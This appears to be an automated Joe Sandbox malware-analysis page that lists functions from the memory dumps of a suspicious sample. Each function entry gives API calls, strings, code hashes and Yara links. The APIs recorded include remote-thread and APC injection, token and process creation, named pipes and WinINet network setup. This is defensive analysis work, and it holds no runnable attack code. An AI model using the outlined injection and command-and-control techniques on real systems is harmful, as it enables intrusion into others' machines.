Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: e447b5ff670cd6589ed4a6518e869322e0d8401e588111de29eaec9ae058076f
Instruction ID: e3f7e24f1092c9e323a022caaafab47447648459dbceecc564c9e769711a7de0
Opcode Fuzzy Hash: e447b5ff670cd6589ed4a6518e869322e0d8401e588111de29eaec9ae058076f
Instruction Fuzzy Hash: 3151C271A00204EBCB21FF7988449AEFBB5FF40734F188229EA65961D0E771FA51CB61

Function 03985DBA Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03985E1C
_memcpy_s.LIBCMT ref: 03985E91
__fileno.LIBCMT ref: 03985EF1
__read.LIBCMT ref: 03985EF8
__filbuf.LIBCMT ref: 03985F1C
_memset.LIBCMT ref: 03985F62
_memset.LIBCMT ref: 03985F8D

Part of subcall function 039868C8: __getptd_noexit.LIBCMT ref: 039868C8

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: 1f39b527286e668607814d7425d22a3f506632a424d9febc42428c9cc82c10c6
Instruction ID: 4bfa460e113f3eb84cefe0a2236f8e91f7e635ba8a8fae11039bfffbf0acc72e
Opcode Fuzzy Hash: 1f39b527286e668607814d7425d22a3f506632a424d9febc42428c9cc82c10c6
Instruction Fuzzy Hash: C051C571900204FFCB20FF69CC4469EFBB9EFC2360F1A8669E82596191D3319A59CB51

Function 03D73D12 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98processCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateProcessWithLogonW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,03D73F37,F3E8296A,83FFFFE3,03D7406E,74DEE010), ref: 03D73D44
GetLastError.KERNEL32 ref: 03D73D56
_memset.LIBCMT ref: 03D73D9F

Strings

system32, xrefs: 03D73DA4
sysnative, xrefs: 03D73D82

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CreateErrorLastLogonProcessWith_memset
String ID: sysnative$system32
API String ID: 2584212486-2461298002
Opcode ID: 51b633d8fb3083dab27443c85c8122cf965ab56aa91fc77aa5d78cdfe0fde3a6
Instruction ID: b7528f0c1401425047644635ca8b518f53372d185cb58f099278595decf95dd0
Opcode Fuzzy Hash: 51b633d8fb3083dab27443c85c8122cf965ab56aa91fc77aa5d78cdfe0fde3a6
Instruction Fuzzy Hash: BE31367BA00204AFCB22EF74AC08FA23BA9EB45710F184195F985DB254F771D614D7E0

Function 03D7575A Relevance: 10.6, APIs: 7, Instructions: 67threadinjectionlibraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000000), ref: 03D7576A
GetProcAddress.KERNEL32(00000000), ref: 03D75771
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 03D7579F
GetThreadContext.KERNEL32(00000000,?), ref: 03D757CE
SetThreadContext.KERNEL32(00000000,00010007), ref: 03D757E9

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Thread$Context$AddressCreateHandleModuleProcRemote
String ID:
API String ID: 1591005814-0
Opcode ID: 88e6fa233e0a85111eca3352286984dbc6f6f30ce9dd6849a7fdb411d084c239
Instruction ID: 6d1d17dca4b21d2e1e8c9fc56ba4ecb49d2272b65493cc4fec406b5e4786652d
Opcode Fuzzy Hash: 88e6fa233e0a85111eca3352286984dbc6f6f30ce9dd6849a7fdb411d084c239
Instruction Fuzzy Hash: 94116D32501219EFDB21AF25EC48EEF7E6DFF06A90F154155FA0AD2184E63089519BA1

Function 03D76074 Relevance: 10.6, APIs: 7, Instructions: 62pipefileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,?,03D76156,03D7626B,00000000,?,03D7626B,?), ref: 03D76098
WaitNamedPipeA.KERNEL32(03D7626B,00002710), ref: 03D760AD
CreateFileA.KERNEL32(03D7626B,C0000000,00000000,00000000,00000003,00000000,00000000,?,00000000,00000000,00000000,?,03D76156,03D7626B,00000000), ref: 03D760C5
SetNamedPipeHandleState.KERNEL32(00000000,03D7626B,00000000,00000000,?,00000000,00000000,00000000,?,03D76156,03D7626B,00000000,?,03D7626B,?), ref: 03D760DB
DisconnectNamedPipe.KERNEL32(00000000,?,00000000,00000000,00000000,?,03D76156,03D7626B,00000000,?,03D7626B,?), ref: 03D760E7
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000,?,03D76156,03D7626B,00000000,?,03D7626B,?), ref: 03D760EF

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: NamedPipe$Handle$CloseCreateDisconnectErrorFileLastStateWait
String ID:
API String ID: 2500665662-0
Opcode ID: a93b4caa8963a51f23de24ffc81ed8e11dbcbbf9258e02eb69021040bf09b8a9
Instruction ID: 8a4fc7d377e66bb50b72b4c762f4c0593e75d2abac25fafd873162eb2051f126
Opcode Fuzzy Hash: a93b4caa8963a51f23de24ffc81ed8e11dbcbbf9258e02eb69021040bf09b8a9
Instruction Fuzzy Hash: 2A116DB2610214BFEB01AB74DC0DF7B3AACEB06B00F004566F946E5194FBB0DE149A60

Function 03D769D9 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03D769E7
ioctlsocket.WS2_32(?,8004667E,?), ref: 03D76A0B
GetTickCount.KERNEL32 ref: 03D76A42
ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 03D76A67

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CountTickioctlsocket
String ID:
API String ID: 3686034022-0
Opcode ID: 84ecc338786dc3042e346b2013c73aa3dbd06adebbd7ab6dacad4f526f9ea1aa
Instruction ID: 04f285c408683b68ec0008cd228a5333daa09efd724b39770db21815ffa49066
Opcode Fuzzy Hash: 84ecc338786dc3042e346b2013c73aa3dbd06adebbd7ab6dacad4f526f9ea1aa
Instruction Fuzzy Hash: 42114876610508BFDB00DFA5CC49BA9BBA8FB00B69F00C061E915EA190F7B4DA448BA1

Function 03D7BE73 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03D7BE7A

Part of subcall function 03D858CD: __FF_MSGBANNER.LIBCMT ref: 03D858F0
Part of subcall function 03D858CD: __NMSG_WRITE.LIBCMT ref: 03D858F7
Part of subcall function 03D858CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE), ref: 03D85944

_malloc.LIBCMT ref: 03D7BE87
_malloc.LIBCMT ref: 03D7BEA2
__snprintf.LIBCMT ref: 03D7BEB5
_malloc.LIBCMT ref: 03D7BED4

Strings

HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 03D7BEA8

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap__snprintf
String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
API String ID: 3929630252-2739389480
Opcode ID: 899a26b6fa6b03e1a9fcde4c295959b23ec11bd961c926952c0410b458b57bd3
Instruction ID: 7a9f50a849bc9c18f2759b33459e1a7c03733b99335ed5c138e0dc876a4c3fbe
Opcode Fuzzy Hash: 899a26b6fa6b03e1a9fcde4c295959b23ec11bd961c926952c0410b458b57bd3
Instruction Fuzzy Hash: 6F0162749013487ED760FF79E884D96BBEDEF45650B00886BF558CB240EA70E9048BB0

Function 03971B7E Relevance: 9.1, APIs: 6, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03971BA9
_memset.LIBCMT ref: 03971BBE
__snprintf.LIBCMT ref: 03971BFC
__snprintf.LIBCMT ref: 03971C18
__snprintf.LIBCMT ref: 03971C78
__snprintf.LIBCMT ref: 03971C8F

Part of subcall function 03984E74: __output_l.LIBCMT ref: 03984EF6

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __snprintf$_memset$__output_l
String ID:
API String ID: 1270732810-0
Opcode ID: 2a8897ec43ab90436752b0e96a364baffae3cad7c46d73969b4e107cd58de504
Instruction ID: 908a40e250b503acff80b3c4ec0ca9dde5a1d1a1d1c4d59c8b57a9b565f6263e
Opcode Fuzzy Hash: 2a8897ec43ab90436752b0e96a364baffae3cad7c46d73969b4e107cd58de504
Instruction Fuzzy Hash: 6D41C476800269BFEB01EFE4CC89DEE7B7DEF45314F0800A5E601BB191D7359A498B61

Function 03D7250F Relevance: 9.1, APIs: 6, Instructions: 114networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

InternetOpenA.WININET(03D7152B,00000003,00000000,00000000,00000000), ref: 03D72590
InternetSetOptionA.WININET(00000005,0003A980,00000004), ref: 03D725AF
InternetSetOptionA.WININET(00000006,0003A980,00000004), ref: 03D725BF
InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,03DA6C58), ref: 03D725D7
InternetSetOptionA.WININET(00000000,0000002B,00000000,00000000), ref: 03D72608
InternetSetOptionA.WININET(0000002C,00000000,00000000), ref: 03D72624

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Internet$Option$ConnectOpen
String ID:
API String ID: 230958251-0
Opcode ID: ee5a686d5058297d57a9f5d92aa26389215e31c6ba076f88de6fb3d4bed12fed
Instruction ID: 8c0932e26e9f47af36f972f992e37a295840650db3861aebc8bc07c32fa7f6cf
Opcode Fuzzy Hash: ee5a686d5058297d57a9f5d92aa26389215e31c6ba076f88de6fb3d4bed12fed
Instruction Fuzzy Hash: 6131A27A240B54B5EA31BB61DD0AFBF3E6CE7C2F51F14841AF6009D2D4F6B48681DA20

Function 03D71A64 Relevance: 9.1, APIs: 6, Instructions: 92memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,03D7167C,00000000,00000000,00000080,?,?,03D7B61F,00000000,00000001,00000000,00000000,03D7167C), ref: 03D71ADC
_memset.LIBCMT ref: 03D71B02

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: ProtectVirtual_memset
String ID:
API String ID: 3860425497-0
Opcode ID: ef13f11573a66299570a86df4605b9b138ba831f81ef42b65caa112e676ce4bb
Instruction ID: 58cd7189798d6af384e235b6f2910338747aaeaa52b747f23350d9faa79235ee
Opcode Fuzzy Hash: ef13f11573a66299570a86df4605b9b138ba831f81ef42b65caa112e676ce4bb
Instruction Fuzzy Hash: 1321063B501212AFDB21FF50E989EBD377CEB02B11F548226F9419B240F63488C2D624

Function 03D735A6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32(00000000), ref: 03D73601
htonl.WS2_32(?), ref: 03D7360C
_malloc.LIBCMT ref: 03D73623

Part of subcall function 03D858CD: __FF_MSGBANNER.LIBCMT ref: 03D858F0
Part of subcall function 03D858CD: __NMSG_WRITE.LIBCMT ref: 03D858F7
Part of subcall function 03D858CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE), ref: 03D85944

_memset.LIBCMT ref: 03D7367C

Part of subcall function 03D7ABCE: __snprintf.LIBCMT ref: 03D7AC0D
Part of subcall function 03D7ABCE: __snprintf.LIBCMT ref: 03D7AC1F

Strings

zyxwvutsrqponmlk, xrefs: 03D73668

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __snprintfhtonl$AllocateHeap_malloc_memset
String ID: zyxwvutsrqponmlk
API String ID: 1734027086-3884694604
Opcode ID: e328312ee63bd4978cdf9bf47a3f6fa234c382ab6de685d755e1808d46bb88b3
Instruction ID: 0472e5b6cc568e09dac430c5f61ffc5c38642b7bd4ac07614da0cc1b64c71361
Opcode Fuzzy Hash: e328312ee63bd4978cdf9bf47a3f6fa234c382ab6de685d755e1808d46bb88b3
Instruction Fuzzy Hash: 3C217C6EE0130477DB20FBB55C45A6FBB9CDF85625F140479E905AF382F534990152F1

Function 03D7847E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D78486
__snprintf.LIBCMT ref: 03D784B9
__snprintf.LIBCMT ref: 03D784D2

Strings

?%s=%s, xrefs: 03D784B0
%s&%s=%s, xrefs: 03D784C9

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __snprintf$_memset
String ID: %s&%s=%s$?%s=%s
API String ID: 444161222-3403399194
Opcode ID: e85e5766381d6fa6a113a7f403a646b6e1f7810e605eceac5cda479cd9aee6b6
Instruction ID: 574d698506b5b596deb20b19a8eb15fa807dd946f4e5f63237c14b412aba4a01
Opcode Fuzzy Hash: e85e5766381d6fa6a113a7f403a646b6e1f7810e605eceac5cda479cd9aee6b6
Instruction Fuzzy Hash: 9E018CB6404200BBDB11EF24CC86E9B77ADEB85B00F844499BD455F142E675FA20C772

Function 03D756D3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,NtQueueApcThread,?,03D752B3,00000000,03D754C2,?,?,?,?,?,?,?,?,?,00000000), ref: 03D756E0
GetProcAddress.KERNEL32(00000000), ref: 03D756E7
ResumeThread.KERNEL32(?,?,03D752B3,00000000,03D754C2,?,?,?,?,?,?,?,?,?,00000000,03D754C2), ref: 03D7570B

Strings

NtQueueApcThread, xrefs: 03D756D6
ntdll, xrefs: 03D756DB

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcResumeThread
String ID: NtQueueApcThread$ntdll
API String ID: 682313787-1374908105
Opcode ID: b10b5378aa72600a438f52671172e3188f91ffb5444c709e3e496c3b70b3196d
Instruction ID: b4617b97107656cc4600dabc7d5951795528b69fb24f027ccf65a8476eb2e936
Opcode Fuzzy Hash: b10b5378aa72600a438f52671172e3188f91ffb5444c709e3e496c3b70b3196d
Instruction Fuzzy Hash: 1CE0D8362403057FEF205BB4EC06B4E3B59AF06E54F004425F12DD41D0E772D420AB04

Function 03D78988 Relevance: 7.9, APIs: 5, Instructions: 369threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 03D7B839
OpenThreadToken.ADVAPI32(00000000), ref: 03D7B840
GetCurrentProcess.KERNEL32(00000008,?), ref: 03D7B850
OpenProcessToken.ADVAPI32(00000000), ref: 03D7B857
CloseHandle.KERNEL32(?), ref: 03D7B86D

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CurrentOpenProcessThreadToken$CloseHandle
String ID:
API String ID: 2405408533-0
Opcode ID: 101abdcfb28cbc3dc5b36586bd673292e97a9a8a6e655c1cad5fea538df8e116
Instruction ID: d9cdbe7ddbb4f4aa22ce06b1db9693ea1f8344a0dc6248014a3b3731f0f4439c
Opcode Fuzzy Hash: 101abdcfb28cbc3dc5b36586bd673292e97a9a8a6e655c1cad5fea538df8e116
Instruction Fuzzy Hash: 508121DA31A311B5D134F3765D5FFBB294CDF41AA5F004E2BB686A8080BB67C444A1B7

Function 0397076A Relevance: 7.8, APIs: 5, Instructions: 280COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0397639A: _malloc.LIBCMT ref: 039763A0
Part of subcall function 0397639A: _malloc.LIBCMT ref: 039763B0

_malloc.LIBCMT ref: 039707F2

Part of subcall function 03984D1B: __FF_MSGBANNER.LIBCMT ref: 03984D3E
Part of subcall function 03984D1B: __NMSG_WRITE.LIBCMT ref: 03984D45

_malloc.LIBCMT ref: 039708BB
__snprintf.LIBCMT ref: 03970924
__snprintf.LIBCMT ref: 03970942
__snprintf.LIBCMT ref: 03970960

Part of subcall function 039782EA: _memset.LIBCMT ref: 03978333

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _malloc$__snprintf$_memset
String ID:
API String ID: 3514394824-0
Opcode ID: f0174a944cfa8f73630f7087a6355ca267e86ee3d2504a31ef01416b9d1456d3
Instruction ID: c0a633650f734328fb88e4b5a3eff9d8a991372d224b6f2ba87873c5e5e8a525
Opcode Fuzzy Hash: f0174a944cfa8f73630f7087a6355ca267e86ee3d2504a31ef01416b9d1456d3
Instruction Fuzzy Hash: DE812979A04301AEF621FF758D45B2FBAE9AFC4350F148929F5949E3E0EB71C8418B52

Function 03D74021 Relevance: 7.6, APIs: 5, Instructions: 65processCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32(?,00000000,03D77FC2,00000000,00000000,00000001,3D8359EC,00000000,00000000,458D0874,55FF50D4,?,03D78ED8,00000011,03D74119,?), ref: 03D74047
GetLastError.KERNEL32(?,?,03D77FC2,03D78ED8,?), ref: 03D74057
GetLastError.KERNEL32(?,?,03D77FC2,03D78ED8,?), ref: 03D74071

Part of subcall function 03D73E1F: _memset.LIBCMT ref: 03D73E4D
Part of subcall function 03D73E1F: _memset.LIBCMT ref: 03D73E69

CreateProcessA.KERNEL32(00000000,03D77FC2,00000000,00000000,00000001,3D8359EC,00000000,00000000,458D0874,55FF50D4,?,03D78ED8,00000011,03D74119,?,006A0875), ref: 03D74096
GetLastError.KERNEL32(?,?,03D77FC2,03D78ED8,?), ref: 03D740A0

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateProcess_memset$User
String ID:
API String ID: 3779600536-0
Opcode ID: fa0c710c110ba3098ee971b3f7ce86ed5391d1ef59ff09e670393e574aa06e54
Instruction ID: a5ac820fc52b553a4fe011afe2affc39380b64118ff3323b801160ed2f3fe05c
Opcode Fuzzy Hash: fa0c710c110ba3098ee971b3f7ce86ed5391d1ef59ff09e670393e574aa06e54
Instruction Fuzzy Hash: 3B115236211640BEDB339B629C48E277ABDFFC6F05B24491EF596C4550E7318060EA21

Function 03D77A57 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03D77A7C
GetTickCount.KERNEL32 ref: 03D77A94
shutdown.WS2_32(00000000,00000002), ref: 03D77AAF
shutdown.WS2_32(00000000,00000002), ref: 03D77ABC
closesocket.WS2_32(00000000), ref: 03D77AC1

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CountTickshutdown$closesocket
String ID:
API String ID: 3414035747-0
Opcode ID: caea42edc8a89a7cb27206204b4ee41518563c4ef3c149ce5f6fa9eae63ecee8
Instruction ID: 0851cc42158e740bccc5e5b8dbeeda5ee436bc6af3e5247e8775a8128c9c4a48
Opcode Fuzzy Hash: caea42edc8a89a7cb27206204b4ee41518563c4ef3c149ce5f6fa9eae63ecee8
Instruction Fuzzy Hash: 03114F36600B118FEB31DF74D944A27B3A9FB04A14B088E6AD85A97644F732E9058B90

Function 03D75E61 Relevance: 7.6, APIs: 5, Instructions: 57pipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,03D7636E,?,?,?,?,?,03D78AF2), ref: 03D75E86
CloseHandle.KERNEL32(?,?,00000000,03D7636E,?,?,?,?,?,03D78AF2), ref: 03D75E8B
CloseHandle.KERNEL32(?,?,00000000,03D7636E,?,?,?,?,?,03D78AF2), ref: 03D75E90
DisconnectNamedPipe.KERNEL32(?,?,00000000,03D7636E,?,?,?,?,?,03D78AF2), ref: 03D75EA0
CloseHandle.KERNEL32(?,?,00000000,03D7636E,?,?,?,?,?,03D78AF2), ref: 03D75EA9

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CloseHandle$DisconnectNamedPipe
String ID:
API String ID: 2155524452-0
